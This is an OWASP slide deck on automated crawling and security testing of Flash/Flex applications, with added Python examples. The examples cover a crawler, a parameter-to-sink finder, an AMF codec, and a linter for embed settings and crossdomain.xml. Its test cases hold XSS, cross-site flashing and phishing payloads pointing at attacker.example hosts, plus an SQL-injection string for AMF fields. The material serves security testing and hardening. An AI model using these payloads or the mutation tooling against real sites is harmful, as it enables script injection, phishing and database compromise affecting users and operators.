
Slide 1: Automated Crawling & Security Testing of Flash/Flex Web Applications
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation, http://www.owasp.org
Ronen Bachar, IBM, email: rbachar@il.ibm.com, phone: 09-9629852
14/9/2008

Slide 2: Agenda
- Introduction to Flash/Flex applications
- AMF
  - High-level description
  - AMF data format and its usage
- Automated Flash testing challenges
  - Automated crawling
  - Automated testing
- Overview of security risks in Flash/Flex applications

Slide 3: Flash/Flex Introduction
- Flash
  - Developed by Macromedia (now Adobe)
  - Used to create animations, ads and various web components, to integrate video into web pages and, more recently, to develop rich Internet applications (RIAs)
  - Consumed as a web page element or as a standalone application
  - Includes scripting languages: ActionScript 1, 2 and 3
- Flash Player
  - Runs Flash content (the SWF file format)
  - Available as a browser plug-in (for Mozilla Firefox, Internet Explorer and others) or as a standalone player
  - Each version is backward-compatible with content built for earlier versions

Slide 4: Flash/Flex Introduction (ctd.)
- Flex
  - A framework for developing RIAs that run in Flash Player
  - Instead of forcing applications into the "animation" (timeline) model, developers build real applications using MXML (an XML dialect) to lay out user-interface components and ActionScript for the logic
  - Requires Flash Player 9
  - Same file format (SWF)
  - Supports only ActionScript 3
  - AJAX-like behaviour: the client exchanges data with the server asynchronously, without page reloads

Slide 5: Flash/Flex Introduction (ctd.)
When a Flash movie is embedded in a web page:
- Flash -> DOM: the movie interacts with the DOM by executing JavaScript code
- JavaScript (HTML host) -> Flash object: page scripts call into the movie
- Layering: Host (browser) > Flash Player > Flash movie (SWF)

Slide 6: Flash in HTML page

Slide 7: AMF - ActionScript Message Format
- A binary message format
- Used primarily to exchange data between a Flash/Flex application and its server-side component by serializing ActionScript data types
- NetConnection uses AMF to send messages to a server and asynchronously invoke remote services (RPC)
- Two encodings exist, AMF 0 and AMF 3; AMF 3 requires Flash Player 9
- The AMF protocol specifications are public (see references)
- Understanding the AMF format is crucial for manipulating (fuzzing) applications that use it

Slide 8: AMF Format Description
- Version: 0 or 3
- Header(s):
  - Header name
  - Data: serialized data (binary)
- Message(s):
  - Target URI: the service/method name in a request, the response result in a reply
  - Response URI: /id, the client-side identifier that matches a reply to its call
  - Data: serialized data (binary)

Slide 9: AMF Example: raw request, decoded request, decoded response

Slide 10: Challenges of Crawling Flash
- To test Flash/Flex-based applications properly we have to crawl them:
  - Detect server-side end-points (new URLs)
  - Detect client-side states and logic (the Flash application tree)
- We must play the Flash movie in its "native" context:
  - The movie runs inside the original HTML page
  - In a browser that includes a JavaScript engine (for JavaScript <-> Flash interaction)
  - Using the Flash Player plug-in
- We must support dynamic content too (where script creates content on the fly); parsing the SWF is not enough

Slide 11: Challenges of Crawling Flash (ctd.)
- States in a Flash application
- Navigation in a Flash application
- Blind crawling (no sound, no pop-ups, no visuals)
- Support inline movies too
- Since Flash Player is designed only to play movies, its programming interface is limited

Slide 12: State Management in Flash Applications
- Flash applications are primarily animation-based, which raises the following questions:
  - How do we identify/define an "application state"?
  - How do we get the current state?
  - How do we tell that the current state has finished, i.e. that the player is idle?
- We define a "state" as a container of GUI objects, i.e. movie clips, buttons and text fields
- Heuristics and the Flash plug-in give us hints that the player is "idle"

Slide 13: Navigation in a Flash Application
- Navigate the Flash application in its native flow
  - It is still hard to define the correct "functional flow"
- Build the application tree (each node represents a state)
- Get the current state's details (its GUI objects)
- Activate each GUI object according to its type:
  - Button: click it, move the mouse over the button area
  - TextField: fill it in
  - MovieClip: click it
- Navigate between states through Flash
  - Unfortunately, navigating back is not trivial
  - We need to store and replay activation sequences

Slide 14: Flash application tree (diagram). Nodes: Root (State A), State B, State C, State D, State E, State F; edges are labelled with the GUI objects (MC2, B1, B2, MC1) activated to reach each state.
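The crawl described on slides 13 and 14, as an added example (not code from the talk or from IBM's scanner): a state is the set of GUI objects on stage, each object is activated according to its type, and because there is no reliable "back" in a Flash movie every stored sequence is replayed from the root. The Flash Player is replaced by a constructed simulation (`SimulatedMovie`, `SAMPLE_STATES`, `SAMPLE_TRANSITIONS`), whose layout is an assumption loosely modelled on the slide 14 diagram.

```python
"""Model-based crawl of a Flash application tree. The movie is simulated;
a real crawler would drive the Flash Player plug-in through its host page."""
from collections import deque, namedtuple

# A GUI object on stage; kind is Button, TextField or MovieClip.
GuiObject = namedtuple("GuiObject", "name kind")

# Constructed sample application (assumed layout): Root (state A) leads to
# B, D, E and F; B leads to C; several states lead back to Root.
SAMPLE_STATES = {
    "Root":    [GuiObject("B1", "Button"), GuiObject("B2", "Button"),
                GuiObject("MC1", "MovieClip"), GuiObject("MC2", "MovieClip"),
                GuiObject("TF_search", "TextField")],
    "State B": [GuiObject("B3", "Button"), GuiObject("B4", "Button")],
    "State C": [GuiObject("B_home", "Button")],
    "State D": [GuiObject("TF_login", "TextField"), GuiObject("B_go", "Button")],
    "State E": [GuiObject("MC_video", "MovieClip")],
    "State F": [GuiObject("B_close", "Button")],
}
SAMPLE_TRANSITIONS = {          # (state, activated object) -> next state
    ("Root", "MC2"): "State B", ("Root", "B1"): "State D",
    ("Root", "B2"): "State E",  ("Root", "MC1"): "State F",
    ("State B", "B3"): "State C", ("State B", "B4"): "Root",
    ("State C", "B_home"): "Root", ("State F", "B_close"): "Root",
}

class SimulatedMovie:
    """Stand-in for the plug-in: exposes only what a crawler could get from
    the real player (reload, current objects, activate an object)."""
    def __init__(self, states, transitions):
        self.states, self.transitions = states, transitions
        self.reset()

    def reset(self):                      # reload the SWF: back to the root state
        self.current = "Root"

    def current_objects(self):
        return list(self.states[self.current])

    def activate(self, obj):
        # Buttons and movie clips are clicked and may change state; a text
        # field is only filled in, which never moves the movie by itself.
        if obj.kind in ("Button", "MovieClip"):
            self.current = self.transitions.get((self.current, obj.name), self.current)

def state_signature(objects):
    """Two states are considered equal when they expose the same GUI objects."""
    return tuple(sorted(objects))

def replay(movie, sequence):
    """Reload the movie and re-activate the stored sequence from the root:
    this replaces the 'back' navigation that Flash does not offer."""
    movie.reset()
    objects = movie.current_objects()
    for name in sequence:
        movie.activate(next(o for o in objects if o.name == name))
        objects = movie.current_objects()
    return objects

def crawl(movie, max_depth=10):
    """Breadth-first build of the application tree. Returns (tree, edges):
    tree maps a state signature to the shortest activation sequence that
    reaches it, edges lists (from_signature, object name, to_signature)."""
    tree = {state_signature(replay(movie, [])): []}
    edges, work = [], deque([[]])
    while work:
        sequence = work.popleft()
        if len(sequence) >= max_depth:
            continue
        objects = replay(movie, sequence)
        here = state_signature(objects)
        for obj in objects:
            if obj.kind == "TextField":
                continue                   # filled in, but not a transition
            replay(movie, sequence)        # return to this state first
            movie.activate(obj)
            there = state_signature(movie.current_objects())
            edges.append((here, obj.name, there))
            if there not in tree:          # new state: remember how to reach it
                tree[there] = sequence + [obj.name]
                work.append(tree[there])
    return tree, edges

def build_sample_movie():
    return SimulatedMovie(SAMPLE_STATES, SAMPLE_TRANSITIONS)

if __name__ == "__main__":
    tree, edges = crawl(build_sample_movie())
    for signature, sequence in tree.items():
        print([o.name for o in signature], "<-", " > ".join(sequence) or "(root)")
```

Keying states by their GUI-object set is the slide's heuristic, and the example shows its cost: every visit re-runs the sequence from the root, so the crawl is quadratic in depth, and two visually different states that happen to expose the same objects would collapse into one node.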

Slide 15: Testing Flash Applications
- Identify controlled Flash parameters:
  - Query parameters (from HTML): http://domain/movie.swf?param1=value1
  - FlashVars (from HTML)
  - Uninstantiated variables (from ActionScript), e.g. getURL(clickTag, '_self') where clickTag is never assigned in the movie
- Locate potentially dangerous code:
  - Where controlled Flash parameters are used inside potentially dangerous native functions (PDNFs: getURL, loadMovie, loadVariables, etc.)
- Save the sequences leading to the potentially dangerous code and associate each sequence with its parameter

Slide 16: Testing Flash Applications (ctd.)
- Mutation: inject values into the parameters
  - XSS: param1=javascript:window.open('http://my.site')
  - XSF (cross-site flashing): param2=www.movie.swf
  - Phishing: param3=www.my.site
- Validation
  - Play the sequence that belongs to the mutated parameter
  - Verify the test result
    - Browser events
    - ActionScript level
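The first two steps of slides 15 and 16 (find controlled parameters reaching a PDNF, then build the mutations) as an added example, not code from the talk: a static pass over decompiled ActionScript 2 that treats a variable as controllable when the script never assigns it or when it is read from `_root`, `_level0` or `_global`, and turns each finding into a query-string and FlashVars test case. The ActionScript fragment, the `http://domain/movie.swf` URL and the `attacker.example` hosts are constructed for this example; the `on (release)` handler is a guess at how such a sink usually appears.

```python
"""Find attacker-controlled parameters that reach potentially dangerous
native functions (PDNFs) in ActionScript 2 and generate mutation cases."""
import re
from urllib.parse import urlencode

# Constructed ActionScript 2 fragment (not code from the talk).
SAMPLE_AS = '''
var home = "http://example.com/";
var clickTag;                     // declared, never assigned: controllable
on (release) {
    getURL(clickTag, "_self");    // sink fed by an uninstantiated variable
}
loadMovie(_root.skin, holder);    // _root.skin is settable via FlashVars or the query string
loadVariables("data.txt", this);  // literal target: not controllable
getURL(home + "page", "_blank");  // home is assigned inside the movie
'''

PDNFS = ("getURL", "loadMovie", "loadMovieNum", "loadVariables", "loadVariablesNum")
CALL_RE = re.compile(r"\b(%s)\s*\(([^)]*)\)" % "|".join(PDNFS))
STRING_RE = re.compile(r'"[^"]*"|\'[^\']*\'')
ROOT_REF_RE = re.compile(r"\b(?:_root|_level0|_global)\.([A-Za-z_]\w*)")
IDENT_RE = re.compile(r"\b([A-Za-z_]\w*)\b")
ASSIGN_RE = re.compile(r"\b([A-Za-z_]\w*)\s*=[^=]")
KEYWORDS = {"this", "true", "false", "null", "undefined"}

def find_controlled_sinks(source):
    """Return [{'line', 'sink', 'param'}] for every PDNF call whose first
    argument references a variable the script never assigns (so the host
    page or query string can define it) or an explicit _root/_level0/_global
    variable. Only the first argument (the URL or target) is examined."""
    assigned = set(ASSIGN_RE.findall(STRING_RE.sub('""', source)))
    findings = []
    for call in CALL_RE.finditer(source):
        sink, args = call.group(1), call.group(2)
        first = STRING_RE.sub('""', args).split(",")[0]   # drop string literals
        line = source.count("\n", 0, call.start()) + 1
        controlled = set(ROOT_REF_RE.findall(first))
        bare = IDENT_RE.findall(ROOT_REF_RE.sub("", first))
        controlled |= {v for v in bare if v not in assigned and v not in KEYWORDS}
        for param in sorted(controlled):
            findings.append({"line": line, "sink": sink, "param": param})
    return findings

# Mutation payloads in the spirit of slide 16; the hosts are placeholders.
# Which payload fits which sink is a heuristic choice made for this example.
PAYLOADS = {
    "getURL": [("xss", "javascript:window.open('http://attacker.example')"),
               ("phishing", "http://attacker.example/login")],
    "loadMovie": [("xsf", "http://attacker.example/evil.swf")],
    "loadMovieNum": [("xsf", "http://attacker.example/evil.swf")],
    "loadVariables": [("variable-injection", "http://attacker.example/vars.txt")],
    "loadVariablesNum": [("variable-injection", "http://attacker.example/vars.txt")],
}

def mutations(swf_url, findings):
    """One test case per finding and payload: the query-string form of the
    injection and the equivalent FlashVars value for the embedding page.
    Each case keeps sink and parameter so the crawler can replay the
    sequence that was saved for that parameter."""
    cases = []
    for f in findings:
        for kind, payload in PAYLOADS.get(f["sink"], []):
            query = urlencode({f["param"]: payload})
            cases.append({"kind": kind, "param": f["param"], "sink": f["sink"],
                          "url": "%s?%s" % (swf_url, query), "flashvars": query})
    return cases

if __name__ == "__main__":
    found = find_controlled_sinks(SAMPLE_AS)
    for f in found:
        print("line %(line)d: %(sink)s() reached by controllable %(param)s" % f)
    for case in mutations("http://domain/movie.swf", found):
        print(case["kind"], case["url"])
```

Running it on the sample flags `getURL(clickTag, ...)` and `loadMovie(_root.skin, ...)` and leaves the two calls with literal or locally assigned targets alone. The validation step of slide 16 (replaying the sequence and watching browser events) needs the live player and is not part of this static pass.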

Slide 17: Testing AMF Parameters
- Test server-side AMF-speaking end-points
- Use standard parameter-tampering techniques on the AMF message fields: XSS, SQLi, HTTP response splitting, command execution, etc.
- Example (original request vs. mutated request): a string field is replaced with ' having 1=1--
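The AMF 0 packet layout of slide 8 and the field mutation of slide 17, as one added example that is not code from the talk: an encoder and decoder for the packet envelope (version, headers, messages with target URI, response URI and length-prefixed body) and the AMF 0 value types a remoting call normally carries, followed by a mutation that swaps one RPC argument for the slide's `' having 1=1--` payload and re-encodes with correct lengths. The `UserService.login` target, the `Credentials` header and the argument values are constructed for the example; AMF 3 bodies, dates, typed objects and ECMA arrays are deliberately not handled.

```python
"""Minimal AMF 0 packet codec plus an argument-mutation helper."""
import struct

AMF0_NUMBER, AMF0_BOOL, AMF0_STRING, AMF0_OBJECT = 0x00, 0x01, 0x02, 0x03
AMF0_NULL, AMF0_UNDEFINED, AMF0_STRICT_ARRAY, AMF0_LONG_STRING = 0x05, 0x06, 0x0A, 0x0C
OBJECT_END = b"\x00\x00\x09"          # empty key followed by the object-end marker

def _utf8(s, long=False):
    """Length-prefixed UTF-8: u16 length, or u32 for long strings."""
    data = s.encode("utf-8")
    return struct.pack(">I" if long else ">H", len(data)) + data

def encode_value(v):
    """Serialize a Python value as an AMF 0 value (type marker + payload)."""
    if v is None:
        return bytes([AMF0_NULL])
    if isinstance(v, bool):                      # bool before int: bool is an int
        return bytes([AMF0_BOOL, int(v)])
    if isinstance(v, (int, float)):              # every AMF 0 number is a double
        return bytes([AMF0_NUMBER]) + struct.pack(">d", float(v))
    if isinstance(v, str):
        if len(v.encode("utf-8")) > 0xFFFF:
            return bytes([AMF0_LONG_STRING]) + _utf8(v, long=True)
        return bytes([AMF0_STRING]) + _utf8(v)
    if isinstance(v, list):                      # strict array: u32 count + values
        return bytes([AMF0_STRICT_ARRAY]) + struct.pack(">I", len(v)) + b"".join(map(encode_value, v))
    if isinstance(v, dict):                      # anonymous object: key/value pairs
        return bytes([AMF0_OBJECT]) + b"".join(_utf8(k) + encode_value(x) for k, x in v.items()) + OBJECT_END
    raise TypeError("cannot encode %r" % type(v))

class Decoder:
    def __init__(self, data):
        self.data, self.pos = data, 0
    def take(self, n):
        if self.pos + n > len(self.data):
            raise ValueError("truncated AMF data")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk
    def u8(self):  return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def utf8(self, long=False):
        return self.take(self.u32() if long else self.u16()).decode("utf-8")
    def value(self):
        marker = self.u8()
        if marker == AMF0_NUMBER:       return struct.unpack(">d", self.take(8))[0]
        if marker == AMF0_BOOL:         return self.u8() != 0
        if marker == AMF0_STRING:       return self.utf8()
        if marker == AMF0_LONG_STRING:  return self.utf8(long=True)
        if marker in (AMF0_NULL, AMF0_UNDEFINED): return None
        if marker == AMF0_STRICT_ARRAY: return [self.value() for _ in range(self.u32())]
        if marker == AMF0_OBJECT:
            obj = {}
            while True:
                key = self.utf8()
                if key == "":                   # end: empty key + 0x09 marker
                    if self.u8() != 0x09:
                        raise ValueError("malformed object end")
                    return obj
                obj[key] = self.value()
        raise ValueError("unsupported AMF 0 type marker 0x%02x" % marker)

def encode_packet(version, headers, messages):
    """headers: [(name, must_understand, value)], messages: [(target, response, value)]."""
    out = struct.pack(">HH", version, len(headers))
    for name, must_understand, value in headers:
        body = encode_value(value)
        out += _utf8(name) + bytes([int(must_understand)]) + struct.pack(">I", len(body)) + body
    out += struct.pack(">H", len(messages))
    for target, response, value in messages:
        body = encode_value(value)
        out += _utf8(target) + _utf8(response) + struct.pack(">I", len(body)) + body
    return out

def decode_packet(data):
    d = Decoder(data)
    version, headers, messages = d.u16(), [], []
    for _ in range(d.u16()):
        name, must_understand = d.utf8(), d.u8() != 0
        d.u32()                      # body length; 0xFFFFFFFF means unknown, so parse instead
        headers.append((name, must_understand, d.value()))
    for _ in range(d.u16()):
        target, response = d.utf8(), d.utf8()
        d.u32()
        messages.append((target, response, d.value()))
    if d.pos != len(data):
        raise ValueError("trailing bytes after last message")
    return version, headers, messages

def mutate_argument(packet, message_index, arg_index, payload):
    """Decode a captured request, replace one RPC argument, re-encode. Because
    every field is re-serialized, all length prefixes stay consistent."""
    version, headers, messages = decode_packet(packet)
    target, response, args = messages[message_index]
    if not isinstance(args, list):
        raise ValueError("message body is not an argument array")
    args = list(args)
    args[arg_index] = payload
    messages[message_index] = (target, response, args)
    return encode_packet(version, headers, messages)

# Constructed remoting call: login(username, password, options) with one header.
SAMPLE_REQUEST = encode_packet(0,
    [("Credentials", False, {"userid": "alice"})],
    [("UserService.login", "/1", ["alice", "s3cret", {"remember": True}])])
SQLI_PAYLOAD = "' having 1=1--"       # the mutation shown on slide 17
```

The decoder ignores the length field of each message and parses the body instead, which is what a fuzzer must do anyway: after a mutation the original lengths are wrong, and a server that trusts them is itself a finding. A mutated request is sent as the body of a POST with `Content-Type: application/x-amf`, exactly like the original.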

Slide 18: Overview of Security Risks in Flash/Flex Applications
- XSS through Flash: read and write access to the HTML page or its JavaScript code
- XSF (cross-site flashing): read and write access to the loading SWF, the HTML page or its JavaScript code
- Phishing through Flash
- AMF parameters: XSS, SQLi
- Cross-domain promiscuous access: read and write access to the HTML page or its JavaScript code

Slide 19: Recommendations
- HTML code
  - Set "allowNetworking" to 'internal'
  - Set "allowScriptAccess" to 'sameDomain'
- Perform data validation on variables passed to URL functions
- Restrict cross-domain access with "crossdomain.xml"
- Use fscommand or ExternalInterface.call instead of "javascript:" URLs
- Compiler settings:
  - Compile the Flash movie for Flash Player 8 or later
  - Set the "Omit trace actions" flag
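The two artefacts slide 19 hardens, checked mechanically, as an added example (not code from the talk): one pass reads the `allowScriptAccess` and `allowNetworking` settings from the `<object>` params and `<embed>` attributes of the page that embeds the SWF, the other flags promiscuous `allow-access-from` entries in crossdomain.xml, the "cross-domain promiscuous access" risk of slide 18. The weak and hardened sample documents are constructed; the default values reported for missing attributes are those documented by Adobe (allowNetworking defaults to all, allowScriptAccess to sameDomain since Flash Player 8).

```python
"""Lint the SWF embedding markup and crossdomain.xml against slide 19."""
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

RECOMMENDED = {"allowscriptaccess": {"samedomain", "never"},
               "allownetworking": {"internal", "none"}}
DEFAULTS = {"allowscriptaccess": "sameDomain (Flash Player 8+ default)",
            "allownetworking": "all (default)"}

class EmbedCollector(HTMLParser):
    """Gathers the <param name=...> settings of each <object> and the
    attributes of each <embed>; either element may carry the settings."""
    def __init__(self):
        super().__init__()
        self.embeds, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"tag": "object"}
            self.embeds.append(self._current)
        elif tag == "param" and self._current is not None and "name" in a:
            self._current[a["name"].lower()] = a.get("value", "")
        elif tag == "embed":
            a["tag"] = "embed"
            self.embeds.append(a)

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def check_embed(html):
    """One finding per object/embed setting that is missing or weaker than
    the recommended value; an empty list means the markup is as recommended."""
    parser = EmbedCollector()
    parser.feed(html)
    findings = []
    for embed in parser.embeds:
        for name, good in RECOMMENDED.items():
            value = embed.get(name)
            if value is None:
                findings.append("%s: %s not set, player assumes %s" % (embed["tag"], name, DEFAULTS[name]))
            elif value.lower() not in good:
                findings.append("%s: %s=%s, expected one of %s" % (embed["tag"], name, value, sorted(good)))
    return findings

def check_crossdomain(xml_text):
    """Flag crossdomain.xml rules that let any site read this origin from Flash."""
    findings = []
    for rule in ET.fromstring(xml_text.strip()).iter("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append("allow-access-from domain=%r is promiscuous" % domain)
        elif domain.startswith("*."):
            findings.append("allow-access-from domain=%r trusts every subdomain" % domain)
        if rule.get("secure", "true").lower() == "false":
            findings.append("allow-access-from domain=%r lets SWFs loaded over HTTP use an HTTPS policy" % domain)
    return findings

# Constructed samples: the weak page uses allowScriptAccess=always and leaves
# allowNetworking unset; the hardened page applies the slide's values.
WEAK_HTML = """
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="300" height="200">
  <param name="movie" value="movie.swf">
  <param name="allowScriptAccess" value="always">
  <param name="FlashVars" value="clickTag=http://example.com/">
  <embed src="movie.swf" allowScriptAccess="always" type="application/x-shockwave-flash">
</object>
"""
HARDENED_HTML = """
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="300" height="200">
  <param name="movie" value="movie.swf">
  <param name="allowScriptAccess" value="sameDomain">
  <param name="allowNetworking" value="internal">
  <param name="FlashVars" value="clickTag=http://example.com/">
  <embed src="movie.swf" allowScriptAccess="sameDomain" allowNetworking="internal"
         type="application/x-shockwave-flash">
</object>
"""
WEAK_XML = '<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>'
HARDENED_XML = ('<cross-domain-policy>'
                '<allow-access-from domain="www.example.com" secure="true"/>'
                '</cross-domain-policy>')

if __name__ == "__main__":
    for label, findings in (("weak page", check_embed(WEAK_HTML)),
                            ("hardened page", check_embed(HARDENED_HTML)),
                            ("weak policy", check_crossdomain(WEAK_XML)),
                            ("hardened policy", check_crossdomain(HARDENED_XML))):
        print(label, findings or "ok")
```

Note that `allowNetworking="internal"` still permits `getURL` and `loadMovie` style calls from within the movie; it only blocks the browser-navigation and scripting APIs that reach outside the player, so the "validate variables passed to URL functions" bullet remains necessary alongside it.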

Slide 20: References
- Creating more secure SWF web applications: http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html
- Adobe Flash Player 9 Security: http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_security.pdf
- AMF 0 Specification: http://download.macromedia.com/pub/labs/amf/amf0_spec_121207.pdf
- AMF 3 Specification: http://download.macromedia.com/pub/labs/amf/amf3_spec_121207.pdf
- Testing Flash Applications (Stefano Di Paola / OWASP): http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf

